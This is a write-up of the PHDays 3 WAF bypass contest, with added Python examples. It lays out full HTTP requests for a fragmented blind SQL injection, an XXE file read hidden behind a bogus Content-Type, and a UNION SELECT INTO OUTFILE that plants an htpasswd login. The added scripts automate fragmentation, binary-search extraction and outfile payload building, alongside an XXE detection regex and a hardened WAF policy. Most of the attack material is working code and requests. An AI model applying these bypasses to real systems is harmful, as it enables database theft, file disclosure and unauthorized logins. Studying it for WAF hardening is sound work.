- = PHDays 3 WAF bypass contest
- == Stage 1.
- Blind (boolean-based) SQLi. The WAF checks each field value on its own, so the payload is cut into two-character pieces and every piece is sent in its own <search_name> element; the backend concatenates all elements with the same name before building the query, and no single piece contains anything the filter recognises. Newlines are used where the query needs whitespace:
- POST /api/ HTTP/1.1
- Host: 62.148.7.178
- Content-Length: 1985
- Referer: http://62.148.7.178/
- Content-Type: application/x-www-form-urlencoded; charset=UTF-8
- Accept-Encoding: *
- User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:21.0) Gecko/20100101 Firefox/21.0
- <?xml version="1.0"?><request><search_name>
- </search_name><search_name>Kn</search_name><search_name>ig</search_name><search_name>ht</search_name><search_name>
- '</search_name><search_name>
- a</search_name><search_name>nd</search_name><search_name>
- (</search_name><search_name>or</search_name><search_name>d(</search_name><search_name>su</search_name><search_name>bs</search_name><search_name>tr</search_name><search_name>in</search_name><search_name>g(</search_name><search_name>(s</search_name><search_name>el</search_name><search_name>ec</search_name><search_name>t
- </search_name><search_name>fl</search_name><search_name>ag</search_name><search_name>
- f</search_name><search_name>ro</search_name><search_name>m
- </search_name><search_name>se</search_name><search_name>cr</search_name><search_name>et</search_name><search_name>_t</search_name><search_name>bl</search_name><search_name>
- w</search_name><search_name>he</search_name><search_name>re</search_name><search_name>
- f</search_name><search_name>la</search_name><search_name>g
- </search_name><search_name>=
- </search_name><search_name>'3</search_name><search_name>06</search_name><search_name>6d</search_name><search_name>7f</search_name><search_name>69</search_name><search_name>d7</search_name><search_name>98</search_name><search_name>70</search_name><search_name>06</search_name><search_name>8f</search_name><search_name>ae</search_name><search_name>85</search_name><search_name>21</search_name><search_name>c0</search_name><search_name>61</search_name><search_name>4b</search_name><search_name>2'</search_name><search_name>
- l</search_name><search_name>im</search_name><search_name>it</search_name><search_name>
- 0</search_name><search_name>,1</search_name><search_name>),</search_name><search_name>1,</search_name><search_name>1)</search_name><search_name>)></search_name><search_name>
- 4</search_name><search_name>9 </search_name><search_name>)
- </search_name><search_name>--</search_name><search_name>
- a</search_name></request>
- Flag #1, mysql database test, table secret_tbl, column flag:
- 3066d7f69d79870068fae8521c0614b2
- The second column contains the string /var/lib/sepolgen/1241232eerwqwa/asfgasddddd11111/flag
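- The stage-1 technique, generalised, as an added example (not code from the writeup): a SQLi predicate is cut into two-character fragments and wrapped in repeated <search_name> elements, a naive per-field keyword filter is shown to pass every fragment while rejecting the whole payload, and the boolean oracle is driven with a binary search over ord(substring(...)) rather than one request per candidate character. The keyword list, the secret and the oracle server (a stand-in that reassembles the fragments the way the contest backend did and evaluates the predicate in Python instead of MySQL) are all constructed here.

```python
"""Stage 1, generalised: fragment a SQL injection payload across repeated
<search_name> elements so that a per-field keyword filter only ever sees
harmless two-character pieces, then drive the blind (boolean) oracle with a
binary search instead of one request per candidate character.

Added example, not code from the writeup. The keyword list, the secret and the
oracle server (a stand-in that reassembles the fragments the way the contest
backend did and evaluates the ord(substring(...)) > N predicate in Python
instead of MySQL) are all constructed here."""
import re
import xml.etree.ElementTree as ET
from typing import Callable, List

# Constructed stand-in for a WAF that checks each field value on its own.
WAF_KEYWORDS = ("select", "union", "substring", "from", "where", "limit", "ord(")

# The writeup's predicate with the hard-coded "flag = '<hash>'" filter dropped,
# so it reads the first row of secret_tbl one character at a time.
# Newlines stand in for spaces, as in the original request.
PREDICATE = ("Knight'\nand\n(ord(substring((select\nflag\nfrom\nsecret_tbl\n"
             "limit\n0,1),%d,1))>\n%d)\n--\na")
PREDICATE_RE = re.compile(
    r"ord\(substring\(\(select\sflag\sfrom\ssecret_tbl\slimit\s0,1\),(\d+),1\)\)>\s*(\d+)")


def waf_blocks(value: str) -> bool:
    """True if the naive per-field filter would reject this single field value."""
    low = value.lower()
    return any(k in low for k in WAF_KEYWORDS)


def fragment(payload: str, size: int = 2) -> List[str]:
    """Cut the payload into `size`-character pieces (the writeup used 2)."""
    return [payload[i:i + size] for i in range(0, len(payload), size)]


def build_body(fragments: List[str]) -> str:
    """One <search_name> element per fragment. The payload must not contain
    '<' or '&', which would need XML escaping (the original one does not)."""
    items = "".join("<search_name>%s</search_name>" % f for f in fragments)
    return '<?xml version="1.0"?><request>%s</request>' % items


def reassemble(body: str) -> str:
    """What the vulnerable backend effectively did: concatenate every
    <search_name> value before building the SQL query."""
    root = ET.fromstring(body)
    return "".join(e.text or "" for e in root.iter("search_name"))


def make_oracle(secret: str) -> Callable[[str], bool]:
    """Constructed backend: answers True iff the injected predicate holds
    for `secret`, i.e. ord(secret[pos]) > threshold."""
    def oracle(body: str) -> bool:
        m = PREDICATE_RE.search(reassemble(body))
        if not m:
            return False
        pos, threshold = int(m.group(1)), int(m.group(2))
        return pos <= len(secret) and ord(secret[pos - 1]) > threshold
    return oracle


def extract(send: Callable[[str], bool], length: int) -> str:
    """Recover `length` printable characters with about 7 requests each.
    Loop invariant: lo < ord(char) <= hi."""
    out = []
    for pos in range(1, length + 1):
        lo, hi = 31, 126
        while hi - lo > 1:
            mid = (lo + hi) // 2
            body = build_body(fragment(PREDICATE % (pos, mid)))
            if send(body):
                lo = mid
            else:
                hi = mid
        out.append(chr(hi))
    return "".join(out)


if __name__ == "__main__":
    secret = "3066d7f69d79870068fae8521c0614b2"  # the stage-1 flag, used as sample data
    whole = PREDICATE % (1, 49)
    print("whole payload blocked:", waf_blocks(whole))
    print("any fragment blocked:", any(waf_blocks(f) for f in fragment(whole)))
    print("recovered:", extract(make_oracle(secret), len(secret)))
```

- The fragment size is a trade-off: two characters is short enough that no SQL keyword survives in one element, while the request stays well under any element-count limit the backend might have. A filter that reassembles same-named fields before matching, or rejects repeated fields outright, defeats this.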
- == Flag 2
- Notice the Content-Type trick that switched the WAF off: with an unrecognised type (multipart/whatever) and a non-default charset the WAF does not inspect the body, but the backend XML parser still processes it and resolves the external entity, so this XXE reads the file whose path was leaked in stage 1:
- POST /api/ HTTP/1.1
- Host: 62.148.7.178
- Content-Length: 176
- Referer: http://62.148.7.178/
- Content-Type: multipart/whatever; charset=EUC-JP
- Accept-Encoding: *
- User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:21.0) Gecko/20100101 Firefox/21.0
- <?xml version="1.0" standalone="no"?><!DOCTYPE x [<!ENTITY e SYSTEM
- '/var/lib/sepolgen/1241232eerwqwa/asfgasddddd11111/flag'>]><request><search_name>&e;</search_name></request>
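- The failure mode behind flag 2, as an added example (not code from the writeup): a WAF that only parses bodies whose Content-Type it recognises is blind to a request with a made-up type, while a policy that sniffs the body for XML catches the external entity regardless of the declared type. The allow-list, both WAF policies, the request builder and the sample requests are constructed here; the real fix on the backend is to disable DTD and external-entity resolution in the XML parser.

```python
"""Flag 2 failure mode: a WAF that only inspects request bodies whose
Content-Type it recognises is switched off by an unrecognised type, while the
backend XML parser still processes the body and expands the external entity.

Added example, not code from the writeup. The allow-list, both WAF policies,
the request builder and the sample requests are constructed here."""
import re
from typing import Dict, Tuple

# Constructed allow-list of body types a naive WAF bothers to parse.
INSPECTED_TYPES = ("application/x-www-form-urlencoded", "application/xml", "text/xml")

# General or parameter entity declarations that point outside the document.
XXE_RE = re.compile(rb"<!ENTITY\s+(?:%\s*)?\S+\s+(?:SYSTEM|PUBLIC)\b", re.I)


def build_xxe_request(host: str, entity_path: str, content_type: str) -> bytes:
    """Raw request in the shape of the writeup's, with a Content-Type of our choosing."""
    body = ('<?xml version="1.0" standalone="no"?>'
            "<!DOCTYPE x [<!ENTITY e SYSTEM '%s'>]>"
            "<request><search_name>&e;</search_name></request>" % entity_path).encode()
    headers = (
        "POST /api/ HTTP/1.1\r\nHost: %s\r\nContent-Length: %d\r\n"
        "Content-Type: %s\r\n\r\n" % (host, len(body), content_type)
    ).encode()
    return headers + body


def split_request(raw: bytes) -> Tuple[Dict[str, str], bytes]:
    """Separate header fields (lower-cased names) from the body."""
    head, _, body = raw.partition(b"\r\n\r\n")
    fields = {}
    for line in head.split(b"\r\n")[1:]:
        name, _, value = line.decode("latin-1").partition(":")
        fields[name.strip().lower()] = value.strip()
    return fields, body


def gated_waf(raw: bytes) -> bool:
    """Contest-style behaviour: the body is examined only when the media type
    is on the allow-list, so 'multipart/whatever' is never looked at."""
    fields, body = split_request(raw)
    mime = fields.get("content-type", "").split(";")[0].strip().lower()
    if mime not in INSPECTED_TYPES:
        return False
    return XXE_RE.search(body) is not None


def sniffing_waf(raw: bytes) -> bool:
    """Hardened policy: any body that starts like XML is inspected, whatever
    the declared Content-Type or charset says."""
    _, body = split_request(raw)
    looks_like_xml = body.lstrip().startswith(b"<")
    return looks_like_xml and XXE_RE.search(body) is not None
```

- The charset=EUC-JP part of the original trick is a second lever: a WAF that decodes the body under the declared charset before matching can see different text than the backend does. The sniffing policy above matches raw bytes and ignores the declared charset, which is why it is not affected.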
- == Flag 3
- 494bf6673d0f0b8fafac5b637de9a70d
- Write an htpasswd file via SQLi (UNION SELECT ... INTO OUTFILE, again with a made-up Content-Type so the WAF ignores the body), log in as winner, grab the flag:
- POST /api/ HTTP/1.1
- Host: 62.148.7.178
- Content-Length: 172
- Referer: http://62.148.7.178/
- Content-Type: asdsadsa; charset=EUC-JP
- Accept-Encoding: *
- User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:21.0) Gecko/20100101 Firefox/21.0
- <?xml version="1.0" standalone="no"?><request><search_name>asd' UNION
- select 'admin:XfOn8YD6hQ.NU' into outfile
- '/var/www/thirdstage/winnerpwd' -- a</search_name></request>
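- The flag-3 technique as an added example (not code from the writeup): produce an htpasswd line, check it the way the web server would at login, and wrap it in the UNION SELECT ... INTO OUTFILE injection. The writeup planted a crypt(3) hash ('admin:XfOn8YD6hQ.NU'); this example uses Apache's {SHA} scheme instead so the line can be generated and verified with the standard library alone. The user name, password, output path and injection prefix are assumptions.

```python
"""Flag 3 technique: plant an htpasswd entry by abusing UNION SELECT ... INTO
OUTFILE to write a file the web server reads for authentication.

Added example, not code from the writeup. The writeup planted a crypt(3) hash
('admin:XfOn8YD6hQ.NU'); this example uses Apache's {SHA} scheme instead so the
line can be produced and checked with the standard library. The user name,
password, output path and the injection prefix are assumptions."""
import base64
import hashlib


def htpasswd_sha_line(user: str, password: str) -> str:
    """user:{SHA}base64(sha1(password)), the format `htpasswd -s` writes."""
    digest = hashlib.sha1(password.encode("utf-8")).digest()
    return "%s:{SHA}%s" % (user, base64.b64encode(digest).decode("ascii"))


def verify_htpasswd_line(line: str, user: str, password: str) -> bool:
    """Check a {SHA} entry the way the web server would at login."""
    name, _, stored = line.partition(":")
    if name != user or not stored.startswith("{SHA}"):
        return False
    digest = hashlib.sha1(password.encode("utf-8")).digest()
    return stored[len("{SHA}"):] == base64.b64encode(digest).decode("ascii")


def outfile_payload(line: str, path: str, prefix: str = "asd") -> str:
    """The <search_name> value: close the string literal, UNION in one row that
    holds the htpasswd line, and have MySQL write that row to `path`. The UNION
    must yield the same number of columns as the query it is appended to (one
    here, as in the writeup)."""
    for value in (line, path):
        if "'" in value or "\\" in value or "\n" in value:
            raise ValueError("value would break out of the SQL string literal")
    return "%s' UNION select '%s' into outfile '%s' -- a" % (prefix, line, path)


def request_body(search_name: str) -> str:
    """Body in the shape of the writeup's flag-3 request."""
    return ('<?xml version="1.0" standalone="no"?>'
            "<request><search_name>%s</search_name></request>" % search_name)
```

- INTO OUTFILE needs the FILE privilege, a secure_file_priv setting that allows the target directory, and a path that does not exist yet (MySQL refuses to overwrite), and the file is created by the mysqld user, so it has to land where the web server's configuration reads it. The {SHA} output contains only base64 characters, so it never needs SQL escaping; the quote check is there for arbitrary input.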